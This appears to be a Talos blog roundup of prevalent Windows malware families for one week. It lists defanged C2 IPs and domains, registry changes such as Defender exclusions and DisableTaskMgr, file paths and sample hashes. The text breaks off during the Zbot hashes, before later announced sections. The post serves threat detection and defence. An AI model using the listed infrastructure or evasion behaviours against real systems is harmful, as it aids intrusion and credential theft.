Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 25 and July 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Malware.Nymaim-9874463-0 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Packed.Tofsee-9874757-1 Packed Tofsee is multi-purpose malware that features several modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the botnet's size.
Win.Packed.Redline-9874565-0 Packed Redline Stealer is an information-stealer written in .NET and sold on hacking forums.
Win.Packed.Trickbot-9874595-0 Packed TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Dridex-9874605-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Zbot-9874821-0 Trojan Zbot, also known as Zeus, is a trojan that steals sensitive information, including login credentials to financial websites, using methods like key-logging and form-grabbing.
Win.Packed.Zusy-9874915-0 Packed Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.NetWire-9875000-0 Packed NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Formbook-9875089-1 Dropper Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.

Threat Breakdown

Win.Malware.Nymaim-9874463-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 45 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
47[.]91[.]242[.]212 21
46[.]47[.]98[.]128 6
37[.]152[.]176[.]90 6
92[.]247[.]149[.]150 6
212[.]98[.]131[.]181 6
51[.]218[.]181[.]145 5
190[.]83[.]171[.]183 4
196[.]20[.]111[.]10 4
86[.]61[.]75[.]99 4
94[.]96[.]144[.]221 4
124[.]43[.]17[.]103 4
188[.]172[.]88[.]249 4
78[.]28[.]210[.]44 4
78[.]90[.]243[.]124 3
46[.]238[.]18[.]157 3
202[.]131[.]239[.]125 3
91[.]139[.]200[.]135 3
86[.]106[.]200[.]105 3
109[.]96[.]248[.]32 3
84[.]2[.]61[.]102 3
195[.]228[.]41[.]2 3
151[.]251[.]23[.]210 3
86[.]126[.]136[.]160 3
86[.]123[.]64[.]43 3
77[.]29[.]56[.]4 3

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
exobfeswo[.]com 21
jestionefen[.]com 21
google[.]com 13
microsoft[.]com 8
Files and or directories createdOccurrences
%TEMP%\fro.dfx 21
\Documents and Settings\All Users\pxs\pil.ohu 21

File Hashes

01aa4c13a1391bf11b29c236508e516ed0863c802a4c864626d0cd426ee4f316
04b6d1b8ae7536b102ec1be697a330417dd13f5fcc2d76dad9f7ecfa5e7c7f3f
06f6e8479ec472e5e226be02a68e466d107da496bd42ac332d8fae822dc054a2
074afd77aeefb6b694dfcfe9467e6564415ecd65404939a2bc8777965c0988fd
087d0b9eecf79f655621724b69a09f28511e70cfdb59e429eac9f1781e2cae65
096e8518c1b206831cfee81320411a99270b6e2bd61df4940eee69511920ceb7
0eb13eb73062ac6ecdd2e927b1c6fdeccf217ebc95714ae8cfbb8a14b613e026
1166132a6bffa9f40606422b4a3d5a0823bbae8e82d1508520dfbd044d6efc3b
118f167941ea352ffadd021e817b4ee767825d7d455b45ca759f5966eef33764
140d4c6d99879350036e8b44f680a45d556fd97235388f54a33df54f11d7de1a
14d1c4368d0105d8b68581fe0310f420e9c043aa1f456caedb4879ce852f95e0
179ad536586d08697c248371e9e7248fcc8270adb28bdd4b132e48da1a27e604
1882d34ed46620dd785ddb34413921f40e96c69bb4341e14c083d5a64cdcc21c
18fe62148a2c70d28454fb0b2613e92fe1046139708fd66eaff1bfd804798a60
1b7f246282703264ff2eccde5c6413e498ab889b30cd2df662208b5126ae7b9d
2469b1f8d277539adf47b07096646eee2c028e3f2237fe20f8e7c58465471da9
2523ab124b961eb1ff7638ef51bedf0b314e1dde17430ff90b672f160741236a
2737ff3f8665632946050d324d0553f7285f099c81bfac869a9d8b4136c16f7f
2795182b530ac1d126f81b5c071d76fb6568a465e72fda198ba3f117053b7e21
2869ba6a28f032be4d3988c383ff8b028bcf119ee2a43f93c46ba49aeed63c99
298403800ceec7134ff1e2a05ac546ede0333c0812f8917de645d72bef0f91e2
2a2e948e673b78cd6d984e4c7ccbe199f1974533884042608611d785ed2dec26
2b053be0327aaf08070570b90e0214ec3ba8a2d1324c27e19805192b6f66895b
2b9441bf03ea5beaf5286a1444efdb880d6d589692aa24a7a5b985f3204c3464
31665ca54cc64a3da5f0c05185f49654b13b8857305d3e5e7f29396a96a917f0

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Tofsee-9874757-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 59 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
52
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 52
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
32
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\idadcmnx
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xspsrbcm
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ezwzyijt
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dyvyxhis
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rmjmlvwg
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nifihrsc
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\jebednoy
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zurutdeo
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\avsvuefp
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\pkhkjtue
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wrorqabl
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\faxazjku
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\bwtwvfgq
2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]6 52
185[.]8[.]60[.]110 52
213[.]227[.]140[.]38 52
45[.]93[.]6[.]27 52
109[.]94[.]209[.]17 52
176[.]118[.]167[.]27 52
185[.]186[.]142[.]51 52
82[.]202[.]161[.]188 52
31[.]13[.]65[.]174 51
172[.]217[.]3[.]100 39
142[.]250[.]80[.]19 32
52[.]73[.]137[.]222 31
211[.]231[.]108[.]46/31 27
23[.]3[.]112[.]125 26
13[.]107[.]21[.]200 25
172[.]217[.]12[.]163 25
216[.]239[.]36[.]126 24
31[.]13[.]65[.]52 23
37[.]1[.]217[.]172 22
211[.]231[.]108[.]175 19
162[.]159[.]129[.]81 19
40[.]93[.]207[.]0/31 19
211[.]231[.]108[.]176 18
157[.]240[.]2[.]174 18
40[.]112[.]72[.]205 15

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 52
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 52
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 52
249[.]5[.]55[.]69[.]in-addr[.]arpa 52
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 52
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 52
microsoft-com[.]mail[.]protection[.]outlook[.]com 52
microsoft[.]com 52
www[.]google[.]com 52
www[.]instagram[.]com 51
www[.]bing[.]com 33
www[.]sciencedirect[.]com 32
accounts[.]snapchat[.]com 32
ieeexplore[.]ieee[.]org 26
app[.]snapchat[.]com 24
i[.]instagram[.]com 23
work[.]a-poster[.]info 22
www[.]google[.]ru 22
z-p42-instagram[.]c10r[.]facebook[.]com 16
sso[.]godaddy[.]com 16
www[.]google[.]com[.]ua 14
linkinghub[.]elsevier[.]com 13
native-ps3[.]np[.]ac[.]playstation[.]net 10
bing[.]com 9
www[.]google[.]ca 7

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 52
%SystemRoot%\SysWOW64\config\systemprofile:.repos 52
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 52
%TEMP%\<random, matching '[a-z]{8}'>.exe 51
%System32%\config\systemprofile:.repos 29
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 29
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 6

File Hashes

09727402ba005b5b47ce000d9916980e7aee82005c441371c20fb1b29fb42183
0b8abac3d7f5846ae621b9c38b6bbb13b915b0260cc465695aa5c0227bd93799
1155b6f2ea8714f97e8b036ea3a75234d1dba6b76673c603c892cd020b64afe8
138e5f670922d8c7cd4d77f6c4abb5421c07d9cb619f3fc7ffbf5a046e9b21bc
184569d72ec976ade4689d1aa29db382202c94cf0a58616965e4ce1cf14a8382
1d226fdbf8d10ce5464992323a96240f980c37b21887af254becd95d677a3b66
1e96308c4b13607e0febfe5d806db5d2932ec3ff45a23ad949aa39e38ea16588
1f9eccec3b9af4aee1da6fbaeaeb4882e2736e8d4436cd914b454c0c00786653
21982eee3c6b2ef5b41ddcf3b0b7abdc9acfcd3223e4566f2f4147705ac9766e
23f3aaac99caa848bcb7e1f447dfa2660b105f7a9bafd0f638b857f2616bab55
246ac65cf37e739eefc7249185cb68a6feb7ac5524ee7186ce3625a21138f979
255046cfb76e829946c55834c76bd19262ae524c3df70b4d2a2c8c2702a349b6
26a811740218b65c170fb86545644e90369fe0622e844b535acc42cd023f6cec
277b595cd61efce6913d34a44ad9c13a271d36197b9c2c897287785e7a42ffb9
33d15cc050c93792093c3b2e43dd605a3a32757924cff2077a10afa5e122dba5
37f0f7c00fbdb5fca5d9875f5e97d92ae27846969978bc1b4b09c91cc9bfc91b
3d0cfdcc38c9a23ffc19cbf5ca7ec73f0085cae2d6a3acfc9974ced18a59ab06
4443d09aa604e5c1e35e335219db3513dd5ca2abd10795d2d8b01fc78e5437a9
48d0b84cb126454076f6da816037220d77f7502ebe12759a87ac392b1e81783b
50c0c8d81b141055155bd71ae3cdc40729b6ded50547fd4aa7c019b2f21120a8
5305c2e97f80d61b8bd4a76a264ada20993f68ab0d35f849a751bf9062339c22
57dd207fb299d425edaa6be8e68da057f546474c2110b14195d8228b55cf83c4
58b08c24a80492d4798110fbcb2453e981b7c9c23d38387e350c803a3151fa7a
59e9e4140abc8d45a569ceb404e4a2d030f7bcb59a3f3f067f23ba182c0f61bc
6fa19a9973aec104af8c494af1bce21143006cf3d059d3276d13024df5fbdf7e

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Redline-9874565-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]67[.]75[.]172 6
104[.]26[.]12[.]31 5
104[.]26[.]13[.]31 5
185[.]125[.]18[.]43 2
51[.]38[.]203[.]212 2
141[.]136[.]0[.]74 1
94[.]140[.]115[.]84 1
46[.]29[.]114[.]16 1
45[.]84[.]0[.]108 1
95[.]215[.]205[.]85 1
13[.]52[.]79[.]131 1
185[.]92[.]148[.]234 1
87[.]251[.]71[.]132 1
109[.]234[.]38[.]151 1
45[.]139[.]184[.]124 1
95[.]181[.]172[.]98 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]ip[.]sb 11
api[.]ip[.]sb[.]cdn[.]cloudflare[.]net 10
jevanerrin[.]xyz 2
whatareyousayblog[.]info 1
rdanoriran[.]xyz 1
kathonaror[.]xyz 1
Files and or directories createdOccurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 16
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 12
%LOCALAPPDATA%\Yandex 11
%LOCALAPPDATA%\Yandex\YaAddon 11

File Hashes

28237773005689c15425157b986468a65842d193ade11fb3dd57f7281ec8cc1a
3649b1560d2605bcd939de586acd8adf1dfde16ef14abdb60097fee332abc345
3f53db0b1f94fad4a455c34538e9b3c3d4aa5b697881f328711f7ee87b748e9d
40d1efcb88cbfe9506654137ddfb07db86fbce343845d088e79eb13da4a76d3b
481997c6617377528e51408de7064257ee117b7dee3e0b44bfb09bd1cd3db70d
678556ef73858bdc65cb979c1896cb1d70b785668e6e483c37154cca5c4c88e6
6a976e219af2974ee4d7c7986ba0bf300ab4315a91814589ecb50078376449bb
6dcb7439f46183427fd240aa8f8b5cc9ff68e9c77240bcedc6fe8474f68e3d99
6fd69e3933246b33c9be9c40386ac5da2efff98fb867473ac51fd10f0e8fd61b
7ed79e069369f482b51de61a196fc41becfa845e7975c64e42ec1bb6305d3b45
b545c366c8a9de191c044e5686f58a340618e26273b76d839eaa5e5b73493c20
cf2ce184bc4842083470d8f7d451648f1d615080b750f3a34ac74ed554450fc2
e358fd349ec54deaa1a4926892dd9e1e261777976f78f87627e54e3cbff06019
e9b1c69cc3df6d07ee61d511ea52dc2e24f42cae98c1c9776ebae6021376606b
f56931b6625dda846f88246b0f063487d1591bdf63a70c4a3b84433fca24a16b
f59de21ca84bcc494d5b68094a22bd033a12cfddfb46ed2c04d4c9e41dc12640

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Trickbot-9874595-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 30 samples
MutexesOccurrences
GLOBAL\{<random GUID>} 25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
185[.]14[.]31[.]104 9
78[.]108[.]216[.]47 8
85[.]204[.]116[.]216 7
51[.]81[.]112[.]144 7
134[.]119[.]191[.]11 7
185[.]99[.]2[.]66 6
185[.]90[.]61[.]9 6
194[.]5[.]250[.]121 5
192[.]3[.]247[.]123 5
85[.]204[.]116[.]100 4
5[.]1[.]81[.]68 4
95[.]171[.]16[.]42 4
134[.]119[.]191[.]21 4
181[.]112[.]157[.]42 3
185[.]99[.]2[.]65 3
91[.]235[.]129[.]20 3
131[.]161[.]253[.]190 2
181[.]129[.]134[.]18 2
121[.]100[.]19[.]18 2
200[.]107[.]35[.]154 2
45[.]6[.]16[.]68 2
110[.]232[.]76[.]39 2
103[.]12[.]161[.]194 2
103[.]111[.]83[.]246 2
104[.]244[.]42[.]195 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
support[.]microsoft[.]com 1
help[.]twitter[.]com 1
support[.]apple[.]com 1
support[.]oracle[.]com 1
www[.]intel[.]com 1
load3rd[.]casa 1
Files and or directories createdOccurrences
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs 10
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 5
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 5
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\410a82fa6c31bc3976e373e503fedc26834f7ff5e9c5872637ac673fb30c9736.exe 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\2f2b484e4e2595a5c5de261b39fcbc1bef6753361b30ea5942c803f8466909e0.exe 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\0690656c022396267a513508a1de6900bddc1865271522c7be677759c63605de.exe 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\348e3889b6a35598eee4ac901ac7fe4e647dd5f91871a019ebf9cc001501b2fc.exe 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\39ce75f99dcd894f408299f2c1c61152962c83a41823a57e610f50dcd1933a00.exe 1

File Hashes

01e9b2283fac5b0f49560e6388dfb6c5c0220e7605bdfa2fe395cc6fe2868cf4
0201d06f47eead940c1d4261526c36facac36715ed660a2f7ee15e23f33fd372
0690656c022396267a513508a1de6900bddc1865271522c7be677759c63605de
0761366c3bf2bd2b7aec8b5cdc85d016bc90be9d12b006c5421a3ab5e7a5ba93
0b176aff8a0fbd91b7affc2da8b534713cef162df7f7b021c3e896d483963c05
0b99e33bcb37d2ffcf7636f6e8248d460ead3b75b1c9ffd3117d5663635424ad
0e83de1cda6c1f6d680c05b4d67c0507c43ff3f207b948906dae558788d85dd8
0f6e33110514b9eb9f5143a1376562bcfea723366855c96ee7f1ed282c1dcf5d
1050f7c8cb1e20fd3062964fbe8b4e3db7f28600f755495df0dbda4b44ad83ab
11a67072a2ba0a7aaeb1bf67e99bdf583cd9ffbcd99b745546b4348a8ede0dd2
1377ad0542e2c20e76953c8b62aaaa34be8045249f58108089f9218ce6d55b20
140f3fa0110fcdf801808a5b164779b8c8eedc1802c7c89eb976854180a4757b
1f91e6e9ff836e2b83b13e37f2cdba7600f89b5ad3ff876c5aef8328827041ab
2ead3a1a62d8bd8669697e49e310389694de921a2c310a574b943424779b315b
2f2b484e4e2595a5c5de261b39fcbc1bef6753361b30ea5942c803f8466909e0
2ff8c5a9d4cf6825de9f0e6fffeba4ee13f9ed855fe14f110e7320dace890802
302c0955cfe178abf5b4cd879bee019a0c0af7b92c8af5296456fd8333da1dbc
3238d985c9f9182bff2350fd39d10e401e2f2a97d72d262b2f262bb6678f9891
32954ef90d6883c57c4d8f09bc4dfa868e337af1062a7237f19472a2f9563f3a
348e3889b6a35598eee4ac901ac7fe4e647dd5f91871a019ebf9cc001501b2fc
3922d9ce14cad81d01b8233de148a77ad2972c314061e50bfc214ef9aed1c279
39ce75f99dcd894f408299f2c1c61152962c83a41823a57e610f50dcd1933a00
40202d37b5b637bfced7d1aa4dca0b910c2e8b844c3805267fc12bdedf151214
410a82fa6c31bc3976e373e503fedc26834f7ff5e9c5872637ac673fb30c9736
43b6b49e54fd5af7d8721beb47bbd8c32991bfa2ecd62e8314adaeed25ca7fff

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9874605-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
13
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 13
\Sessions\2\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]3[.]110 13
104[.]23[.]98[.]190 9
104[.]23[.]99[.]190 5
172[.]217[.]197[.]138 4
8[.]253[.]132[.]120/31 3
172[.]217[.]197[.]113 2
172[.]217[.]197[.]102 2
172[.]217[.]197[.]100 2
8[.]249[.]217[.]254 1
8[.]253[.]45[.]249 1
8[.]253[.]131[.]121 1
8[.]248[.]159[.]254 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 10
www3[.]l[.]google[.]com 10
w[.]google[.]com 10
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 7
www[.]agrc0tlr2f[.]com 2
www[.]lysypesmw3[.]com 2
www[.]7gbrvmcgwo[.]com 2
www[.]zst5ezickv[.]com 2
www[.]zu6nieqcji[.]com 2
www[.]b2f22zjnop[.]com 2
www[.]j3sywrnb0a[.]com 2
www[.]aemscmkekh[.]com 2
www[.]xqv9ewmvuv[.]com 1
www[.]owsfm4wblo[.]com 1
www[.]gho0larxcj[.]com 1
www[.]vnal7wwgo1[.]com 1
www[.]qkz9tdrkdn[.]com 1
www[.]d0kjjreo3y[.]com 1
www[.]gl8iua0z9w[.]com 1
www[.]gktiysxdxh[.]com 1
www[.]eaugecaaua[.]com 1
www[.]hmy1hdugoa[.]com 1
www[.]k7g8hhwnbj[.]com 1
www[.]ygmeeqnyu8[.]com 1
www[.]jrqja3hyhh[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 13
\Temp\HncDownload\Update.log 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\HncCheck.exe.log 1
%LOCALAPPDATA%\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl 1

File Hashes

2e2dca525a3d6c9c32a3477bd7f29fc69e31c9dd46b5d2db625259384581fdef
3109748b350add68f221e29ac33615a975dda7b863771103f7678d24a8ba627d
49ddbcceec7944d3ef30a58bc19a14c1c02c67f572578713200854e9df77482d
5d61ffcaa26e9b75f21b07f8291f7c72f536de9cafcbc1c2c624deb097e784c6
6d67121e750d38e028d04863f5e54f73f90e0d3d0c627c70ec5a07787fecd1fd
9194d2eff02eaa1d2c97e6901bb24be0c75ef221803805786d167bedc8f46c79
95d0806e913a2ceeb5780bfc79dabbc3ebded9b8c0cbf8ec03a9ddf2c08606c1
98d58b29ce96f3cc50dbb565c522687a5a06ca269e518f7228fab0ddc4597c64
9cce14d7d3ba7426d80c2843503e194b7956e53893d1fedea108b5ba10928d5e
ad3d28ce414d242e6b27a35ccb7bed2e5f55766cbc2767c3ad0f0852f8193708
ae0969b1d6d8bbeff9c5d26fb110d64d2c4142368031c384c14d9e4c7ccbfc2c
b8ac32e1d2f0082863e0e968cdb4aaf5b1499935f8cb704534df476e6eb2021b
eed17bd1503f30378f2125fcf5723d7df2a6020a8327ab98e3b12b3718302ad9

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zbot-9874821-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\WINRAR 21
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
21
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
13
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
13
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
13
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
140[.]114[.]67[.]67 21
50[.]116[.]43[.]143 13
66[.]151[.]138[.]85 5
192[.]185[.]215[.]158 5
23[.]227[.]38[.]32 3
93[.]157[.]99[.]148 3
74[.]208[.]236[.]190 2
66[.]34[.]208[.]39 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
tevfikaydogan[.]com[.]tr 5
ranchotropical[.]com[.]br 5
ftp[.]garazovebranyexterier[.]sk 5
karczmapodstrzecha[.]drl[.]pl 3
blupeter[.]com[.]au 3
asciogluakaryakit[.]com 3
www[.]paternidadweb[.]com[.]ar 3
manleyhopkins[.]cs[.]vt[.]edu 3
tankjetstudios[.]com 2
jasonmraz[.]com[.]br 2
gregchapmanformayor[.]com[.]au 2
ffp[.]videoheretic[.]com 2
stareanatiunii[.]com 1
Files and or directories createdOccurrences
%TEMP%\abcd.bat 13

File Hashes

0606f00e2ec6b95ca6ca40d8434163eb41bc3022501319dd4dec8331960060c4
0af35be403906c4a7c9763cc574034024b7f86c22fecce83547c93d26e5895e4
13ffc7c30bc4e47887548a59cb7a3c1e212ec6b28cf3a2bb0de24d3e77eaa735
251aea56977dcb1fe216712afb39e757599797687082fc63a322707e87b02792
2f801e999b96fca5a21d51c5a62574774df15e9c99eab9b651f194d488f8b16c
373cf196664ecfb2636d07151336e7c1ab9bb1deba33937005b7f116834cedde
39e7fa978080ed416f7bf1657367f043dbdea8f50dd856d036f5890242f08f33
3b87ccb44b2718381034c2e50e18a9f9b7be47e068b81ae5057f5a95acbcd5a9
48684ec56d4f49cf6c54a1a12d9a591ec00b358d3c13033a9d4b5b5e791edcf1
4c795958819b9f950261af26112f670466567f2f9e8f0dd8cede07b40266d936
4cc498885f5a5b6af3c8a8cb267f1def772b4792a0ff44b322250c0799dc50c9
4eeb1b96de5c227ca7f56844c1c1b70fbab076473960a185718af2f9170c7562
59af78f081ec1cface43bd8579b7d7dfdda7eb68ff41122885de26e0b7bd635e
5e057bc570fe5a8b20f009df7fcf2edaaf07cfa8a8da4b6c2050f9cbcbee8e70
63873bd53052ceee0264aab5cd09080e4efee4dc6476f7d9e1d29ad0c4a6f901
65dc087b24e442b0cbf396d708533eeb7dad2dc1163c146f50b7a37fd126eaa1
65ff5781b79a8ff2ca17b4a97c31d1046eda2cf6f311d21a15b5771061ee6caf
69ca1b12e913d814b8d9e1e165dbf675447ee7b06ee0ead30ae47ea5a4e313e0
746af22576d3d2bd2e98c14ef6a798fb2f52d722781003729e110d9c058a4050
